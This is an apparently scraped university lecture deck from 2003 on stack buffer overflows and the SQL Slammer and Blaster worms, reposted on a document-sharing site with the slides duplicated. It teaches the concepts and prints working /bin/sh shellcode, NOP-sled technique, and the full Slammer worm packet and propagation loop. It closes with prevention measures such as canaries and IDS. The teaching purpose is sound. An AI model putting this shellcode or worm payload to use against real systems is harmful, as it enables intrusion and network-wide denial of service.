CSDL1
Chia sẻ bởi Kim Ngan |
Ngày 19/03/2024 |
10
Chia sẻ tài liệu: CSDL1 thuộc Công nghệ thông tin
Nội dung tài liệu:
Smashing the Stack
Launching or Preventing a
Slammer-like Worm
Mark Shaneck
October 28, 2003
2
More Admin Stuff
Midterm
Nov. 4th.
While Professor Kim is away
Oct. 28: Buffer Overflow
Oct. 30: Review
PPT file is temporarily available.
filename = lec**.PPT
Download if you need!
Today’s slides: available at http://www-users.cs.umn.edu/~shaneck/
3
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
4
General Overview
Can be done on the stack or on the heap.
Can be used to overwrite the return address (transferring control when returning) or function pointers (transferring control when calling the function)
“Smashing the Stack” (overflowing buffers on the stack to overwrite the return address) is the easiest vulnerability to exploit and the most common type in practice
5
Are Buffer Overflows Really A Problem?
A large percentage of CERT advisories are about buffer overflow vulnerabilities.
They dominate the area of remote penetration attacks, since they give the attacker exactly what they want - the ability to inject and execute attack code.
6
Are Buffer Overflows Really A Problem?
7
Are Buffer Overflows Really A Problem?
Percentage of CERT advisories due to buffer overflows each year
8
Stack Smashing Source
“Smashing the Stack for Fun and Profit”, by Aleph One
Published in Phrack, Volume 7, Issue 49
9
Anatomy of the Stack
Assumptions
Stack grows down (Intel, Motorola, SPARC, MIPS)
Stack pointer points to the last address on the stack
10
Example Program
void function(int a, int b, int c){
char buffer1[5];
char buffer2[10];
}
int main(){
function(1,2,3);
}
Let us consider how the stack of this program would look:
11
Stack Frame
Higher Memory Addresses
pushl $3
pushl $2
pushl $1
call function
function prolog
pushl %ebp
movl %esp, %ebp
subl $20, %esp
Allocates space for local variables
12
Linear View Of Frame/Stack
13
Example Program 2
Buffer overflows take advantage of the fact that bounds checking is not performed
void function(char *str){
char buffer[16];
strcpy(buffer, str);
}
int main(){
char large_string[256];
int i;
for (i = 0; i < 255; i++){
large_string[i] = ‘A’;
}
function(large_string);
}
14
Example Program 2
When this program is run, it results in a segmentation violation
4
*str
4
4
ret
sfp
buffer
16
Top of memory
Bottom of stack
Bottom of memory
Top of stack
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
The return address is overwritten with ‘AAAA’ (0x41414141)
Function exits and goes to execute instruction at 0x41414141…..
15
Example Program 3
Can we take advantage of this to execute code, instead of crashing?
void function(int a, int b, int c){
char buffer1[5];
char buffer2[10];
int *r;
r = buffer1 + 12;
(*r) += 8;
}
int main(){
int x = 0;
function(1,2,3);
x = 1;
printf(“%d\n”, x);
}
16
Example Program 3
+8
Note: modern implementations have extra info in the stack between the local variables and sfp. This would slightly impact the value added to the address of buffer1.
buffer1 + 12
This causes it to skip the assignment of 1 to x, and prints out 0 for the value of x
17
So What?
We have seen how we can overwrite the return address of our own program to crash it or skip a few instructions.
How can these principles be used by an attacker to hijack the execution of a program?
18
Exploit Considerations
All NULL bytes must be removed from the code to overflow a character buffer (easy to overcome with xor instruction)
Need to overwrite the return address to redirect the execution to either somewhere in the buffer, or to some library function that will return control to the buffer (many Microsoft dlls have code that will jump to %esp when jumped to properly - there is a convenient searchable database of these on metasploit.org)
If we want to go to the buffer, how do we know where the buffer starts? (Basically just guess until you get it right)
19
Spawning A Shell
First we need to generate the attack code:
jmp 0x1F
popl %esi
movl %esi, 0x8(%esi)
xorl %eax, %eax
movb %eax, 0x7(%esi)
movl %eax, 0xC(%esi)
movb $0xB, %al
movl %esi, %ebx
leal 0x8(%esi), %ecx
leal 0xC(%esi), %edx
int $0x80
xorl %ebx, %ebx
movl %ebx, %eax
inc %eax
int $0x80
call -0x24
.string “/bin/sh”
char shellcode[] =
“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89”
“\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”
“\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff”
“\xff\xff/bin/sh”;
Generating the code is an issue for another day. However, the idea is that you need to get the machine code that you intend to execute.
20
Get the Attack Code to Execute
ret
sfp
buffer
Top of memory
Bottom of stack
Bottom of memory
Top of stack
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
Fill the buffer with the shell code, followed by the address of the beginning of the code.
The address must be exact or the program will crash. This is usually hard to do, since you don’t know where the buffer will be in memory.
S
S
S
S
S
S
S
21
Get the Attack Code to Execute
ret
sfp
buffer
Top of memory
Bottom of stack
Bottom of memory
Top of stack
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
You can increase your chances of success by padding the start of the buffer with NOP instructions (0x90).
As long as it hits one of the NOPs, it will just execute them until it hits the start of the real code.
S
N
N
N
N
N
N
22
How To Find Vulnerabilities
UNIX - search through source code for vulnerable library calls (strcpy, gets, etc.) and buffer operations that don’t check bounds. (grep is your friend)
Windows - wait for Microsoft to release a patch. Then you have about 6 - 8 months to write your exploit…
23
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
24
Slammer Worm Info
First example of a high speed worm (previously only existed in theory)
Infected a total of 75,000 hosts in about 30 minutes
Infected 90% of vulnerable hosts in 10 min
Exploited a vulnerability in MS SQL Server Resolution Service, for which a patch had been available for 6 months
25
Slammer Worm Info
Code randomly generated an IP address and sent out a copy of itself
Used UDP - limited by bandwidth, not network latency (TCP handshake).
Packet was just 376 bytes long…
Spread doubled every 8.5 seconds
Max scanning rate (55 million scans/second) reached in 3 minutes
26
Slammer Worm - Eye Candy
27
Slammer Worm - Eye Candy
28
SQL Server Vulnerability
If UDP packet arrives on port 1434 with first byte 0x04, the rest of the packet is interpreted as a registry key to be opened
The name of the registry key (rest of the packet) is stored in a buffer to be used later
The array bounds are not checked, so if the string is too long, the buffer overflows and the fun starts.
29
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP..
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP.
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca .ÖëÊ
SQL Slammer Worm UDP packet
30
Slammer Worm Main Loop
Main loop of the code is just 22 Intel machine instructions long…
PSEUDO_RAND_SEND:
mov eax, [ebp-4Ch] ; Load the seed from GetTickCount into eax and enter pseudo
; random generation. The pseudo generation also takes input from
; an xor`d IAT entry to assist in more random generation.
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx
mov [ebp-4Ch], eax ; Store generated IP address into sock_addr structure.
31
Slammer Worm Main Loop
push 10h
lea eax, [ebp-50h] ; Load address of the sock_addr
; structure that was created earlier,
; into eax, then push as an argument
; to sendto().
push eax
xor ecx, ecx ; Push (flags) = 0
push ecx
xor ecx, 178h ; Push payload length = 376
push ecx
lea eax, [ebp+3] ; Push address of payload
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto(sock,payload,376,0, sock_addr struct, 16)
jmp short PSEUDO_RAND_SEND
32
Slammer Worm
Could have been much worse
Slammer carried a benign payload - devastated the network with a DOS attack, but left hosts alone
Bug in random number generator caused Slammer to spread more slowly (last two bits of the first address byte never changed)
33
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
34
Blaster Worm
Much more complex then Slammer
Much slower than Slammer
Exploits a buffer overflow vulnerability in Microsoft DCOM RPC interface
Worm downloads a copy of mblast.exe to compromised host from infecting host via TFTP and runs commands to execute it
mblast.exe attempts to carry out SYN flood attack on windowsupdate.com as well as scanning/infecting other hosts
35
Blaster Worm Effects
DOS attack on windowsupdate.com failed - the regular domain name is windowsupdate.microsoft.com
Windowsupdate.com was just a pointer to the windowsupdate.microsoft.com - so Microsoft just decomissioned it
36
Blaster Worm - Eye Candy
37
Blaster-B
Changed name from mblast.exe to teekids.exe
Changed registry entry from “HKLM\Software\Microsoft\Windows\
CurrentVersion\Run\windows auto update” to “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Inet Xp”
Changed hidden internal message from “I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!” to something a bit more obscene
FBI says he did more…. Who to believe?
38
Blaster-B
Jeffrey Parson from Hopkins, MN was arrested because he was careless (used his online handle for the exe name - teekid, distributed viruses on his website which was registered under his real name and address, and was seen testing his worm by witnesses)
Most worm/virus writers aren’t so careless
No current way to track them down
39
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
40
Overflow Prevention Measures
Hand inspection of source code - very time consuming and many vulnerabilities will be missed (Windows - 5 million lines of code with new vulnerabilities introduced constantly)
Various static source code analysis tools - use theorem proving algorithms to determine vulnerabilities in source code - finds many but not all
Make stack non-executable - does not prevent all attacks
41
Overflow Detection Measures
StackGuard
Places a “canary” (32 bit number) on the stack between local variables and the return address
Initialized to some random number at program start up
Before using the return address, it checks the canary with the initial value. If it is different, there was an overflow and the program terminates.
Not foolproof and requires modification of compiler and recompilation of software
42
Buffer Overflow and IDS
Signature-based Intrusion Detection System
Takes time to get signatures
Anomaly Detection system
Hard to find all buffer overflows.
Buffer Overflow does not look abnormal!
Is it? RESEARCH ISSUE!!!
Future Work:
Analysis of worm payload / packet content
See what’s in common for attacks
Can attackers randomize enough to avoid detection?
43
Conclusion
Detecting is hard!
Then what?
Should we wait until MS finds all BOs?
Or wait until we got another Slammer?
Something has to done!
Launching or Preventing a
Slammer-like Worm
Mark Shaneck
October 28, 2003
2
More Admin Stuff
Midterm
Nov. 4th.
While Professor Kim is away
Oct. 28: Buffer Overflow
Oct. 30: Review
PPT file is temporarily available.
filename = lec**.PPT
Download if you need!
Today’s slides: available at http://www-users.cs.umn.edu/~shaneck/
3
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
4
General Overview
Can be done on the stack or on the heap.
Can be used to overwrite the return address (transferring control when returning) or function pointers (transferring control when calling the function)
“Smashing the Stack” (overflowing buffers on the stack to overwrite the return address) is the easiest vulnerability to exploit and the most common type in practice
5
Are Buffer Overflows Really A Problem?
A large percentage of CERT advisories are about buffer overflow vulnerabilities.
They dominate the area of remote penetration attacks, since they give the attacker exactly what they want - the ability to inject and execute attack code.
6
Are Buffer Overflows Really A Problem?
7
Are Buffer Overflows Really A Problem?
Percentage of CERT advisories due to buffer overflows each year
8
Stack Smashing Source
“Smashing the Stack for Fun and Profit”, by Aleph One
Published in Phrack, Volume 7, Issue 49
9
Anatomy of the Stack
Assumptions
Stack grows down (Intel, Motorola, SPARC, MIPS)
Stack pointer points to the last address on the stack
10
Example Program
void function(int a, int b, int c){
char buffer1[5];
char buffer2[10];
}
int main(){
function(1,2,3);
}
Let us consider how the stack of this program would look:
11
Stack Frame
Higher Memory Addresses
pushl $3
pushl $2
pushl $1
call function
function prolog
pushl %ebp
movl %esp, %ebp
subl $20, %esp
Allocates space for local variables
12
Linear View Of Frame/Stack
13
Example Program 2
Buffer overflows take advantage of the fact that bounds checking is not performed
void function(char *str){
char buffer[16];
strcpy(buffer, str);
}
int main(){
char large_string[256];
int i;
for (i = 0; i < 255; i++){
large_string[i] = ‘A’;
}
function(large_string);
}
14
Example Program 2
When this program is run, it results in a segmentation violation
4
*str
4
4
ret
sfp
buffer
16
Top of memory
Bottom of stack
Bottom of memory
Top of stack
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
A
The return address is overwritten with ‘AAAA’ (0x41414141)
Function exits and goes to execute instruction at 0x41414141…..
15
Example Program 3
Can we take advantage of this to execute code, instead of crashing?
void function(int a, int b, int c){
char buffer1[5];
char buffer2[10];
int *r;
r = buffer1 + 12;
(*r) += 8;
}
int main(){
int x = 0;
function(1,2,3);
x = 1;
printf(“%d\n”, x);
}
16
Example Program 3
+8
Note: modern implementations have extra info in the stack between the local variables and sfp. This would slightly impact the value added to the address of buffer1.
buffer1 + 12
This causes it to skip the assignment of 1 to x, and prints out 0 for the value of x
17
So What?
We have seen how we can overwrite the return address of our own program to crash it or skip a few instructions.
How can these principles be used by an attacker to hijack the execution of a program?
18
Exploit Considerations
All NULL bytes must be removed from the code to overflow a character buffer (easy to overcome with xor instruction)
Need to overwrite the return address to redirect the execution to either somewhere in the buffer, or to some library function that will return control to the buffer (many Microsoft dlls have code that will jump to %esp when jumped to properly - there is a convenient searchable database of these on metasploit.org)
If we want to go to the buffer, how do we know where the buffer starts? (Basically just guess until you get it right)
19
Spawning A Shell
First we need to generate the attack code:
jmp 0x1F
popl %esi
movl %esi, 0x8(%esi)
xorl %eax, %eax
movb %eax, 0x7(%esi)
movl %eax, 0xC(%esi)
movb $0xB, %al
movl %esi, %ebx
leal 0x8(%esi), %ecx
leal 0xC(%esi), %edx
int $0x80
xorl %ebx, %ebx
movl %ebx, %eax
inc %eax
int $0x80
call -0x24
.string “/bin/sh”
char shellcode[] =
“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89”
“\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”
“\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff”
“\xff\xff/bin/sh”;
Generating the code is an issue for another day. However, the idea is that you need to get the machine code that you intend to execute.
20
Get the Attack Code to Execute
ret
sfp
buffer
Top of memory
Bottom of stack
Bottom of memory
Top of stack
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
Fill the buffer with the shell code, followed by the address of the beginning of the code.
The address must be exact or the program will crash. This is usually hard to do, since you don’t know where the buffer will be in memory.
S
S
S
S
S
S
S
21
Get the Attack Code to Execute
ret
sfp
buffer
Top of memory
Bottom of stack
Bottom of memory
Top of stack
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
S
You can increase your chances of success by padding the start of the buffer with NOP instructions (0x90).
As long as it hits one of the NOPs, it will just execute them until it hits the start of the real code.
S
N
N
N
N
N
N
22
How To Find Vulnerabilities
UNIX - search through source code for vulnerable library calls (strcpy, gets, etc.) and buffer operations that don’t check bounds. (grep is your friend)
Windows - wait for Microsoft to release a patch. Then you have about 6 - 8 months to write your exploit…
23
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
24
Slammer Worm Info
First example of a high speed worm (previously only existed in theory)
Infected a total of 75,000 hosts in about 30 minutes
Infected 90% of vulnerable hosts in 10 min
Exploited a vulnerability in MS SQL Server Resolution Service, for which a patch had been available for 6 months
25
Slammer Worm Info
Code randomly generated an IP address and sent out a copy of itself
Used UDP - limited by bandwidth, not network latency (TCP handshake).
Packet was just 376 bytes long…
Spread doubled every 8.5 seconds
Max scanning rate (55 million scans/second) reached in 3 minutes
26
Slammer Worm - Eye Candy
27
Slammer Worm - Eye Candy
28
SQL Server Vulnerability
If UDP packet arrives on port 1434 with first byte 0x04, the rest of the packet is interpreted as a registry key to be opened
The name of the registry key (rest of the packet) is stored in a buffer to be used later
The array bounds are not checked, so if the string is too long, the buffer overflows and the fun starts.
29
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP..
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP.
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca .ÖëÊ
SQL Slammer Worm UDP packet
30
Slammer Worm Main Loop
Main loop of the code is just 22 Intel machine instructions long…
PSEUDO_RAND_SEND:
mov eax, [ebp-4Ch] ; Load the seed from GetTickCount into eax and enter pseudo
; random generation. The pseudo generation also takes input from
; an xor`d IAT entry to assist in more random generation.
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx
mov [ebp-4Ch], eax ; Store generated IP address into sock_addr structure.
31
Slammer Worm Main Loop
push 10h
lea eax, [ebp-50h] ; Load address of the sock_addr
; structure that was created earlier,
; into eax, then push as an argument
; to sendto().
push eax
xor ecx, ecx ; Push (flags) = 0
push ecx
xor ecx, 178h ; Push payload length = 376
push ecx
lea eax, [ebp+3] ; Push address of payload
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto(sock,payload,376,0, sock_addr struct, 16)
jmp short PSEUDO_RAND_SEND
32
Slammer Worm
Could have been much worse
Slammer carried a benign payload - devastated the network with a DOS attack, but left hosts alone
Bug in random number generator caused Slammer to spread more slowly (last two bits of the first address byte never changed)
33
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
34
Blaster Worm
Much more complex then Slammer
Much slower than Slammer
Exploits a buffer overflow vulnerability in Microsoft DCOM RPC interface
Worm downloads a copy of mblast.exe to compromised host from infecting host via TFTP and runs commands to execute it
mblast.exe attempts to carry out SYN flood attack on windowsupdate.com as well as scanning/infecting other hosts
35
Blaster Worm Effects
DOS attack on windowsupdate.com failed - the regular domain name is windowsupdate.microsoft.com
Windowsupdate.com was just a pointer to the windowsupdate.microsoft.com - so Microsoft just decomissioned it
36
Blaster Worm - Eye Candy
37
Blaster-B
Changed name from mblast.exe to teekids.exe
Changed registry entry from “HKLM\Software\Microsoft\Windows\
CurrentVersion\Run\windows auto update” to “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Inet Xp”
Changed hidden internal message from “I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!” to something a bit more obscene
FBI says he did more…. Who to believe?
38
Blaster-B
Jeffrey Parson from Hopkins, MN was arrested because he was careless (used his online handle for the exe name - teekid, distributed viruses on his website which was registered under his real name and address, and was seen testing his worm by witnesses)
Most worm/virus writers aren’t so careless
No current way to track them down
39
Buffer Overflows
General Overview of Buffer Overflow Mechanism
Real Life Examples
- SQL Slammer
- Blaster
Prevention and Detection Mechanisms
40
Overflow Prevention Measures
Hand inspection of source code - very time consuming and many vulnerabilities will be missed (Windows - 5 million lines of code with new vulnerabilities introduced constantly)
Various static source code analysis tools - use theorem proving algorithms to determine vulnerabilities in source code - finds many but not all
Make stack non-executable - does not prevent all attacks
41
Overflow Detection Measures
StackGuard
Places a “canary” (32 bit number) on the stack between local variables and the return address
Initialized to some random number at program start up
Before using the return address, it checks the canary with the initial value. If it is different, there was an overflow and the program terminates.
Not foolproof and requires modification of compiler and recompilation of software
42
Buffer Overflow and IDS
Signature-based Intrusion Detection System
Takes time to get signatures
Anomaly Detection system
Hard to find all buffer overflows.
Buffer Overflow does not look abnormal!
Is it? RESEARCH ISSUE!!!
Future Work:
Analysis of worm payload / packet content
See what’s in common for attacks
Can attackers randomize enough to avoid detection?
43
Conclusion
Detecting is hard!
Then what?
Should we wait until MS finds all BOs?
Or wait until we got another Slammer?
Something has to done!
* Một số tài liệu cũ có thể bị lỗi font khi hiển thị do dùng bộ mã không phải Unikey ...
Người chia sẻ: Kim Ngan
Dung lượng: |
Lượt tài: 1
Loại file:
Nguồn : Chưa rõ
(Tài liệu chưa được thẩm định)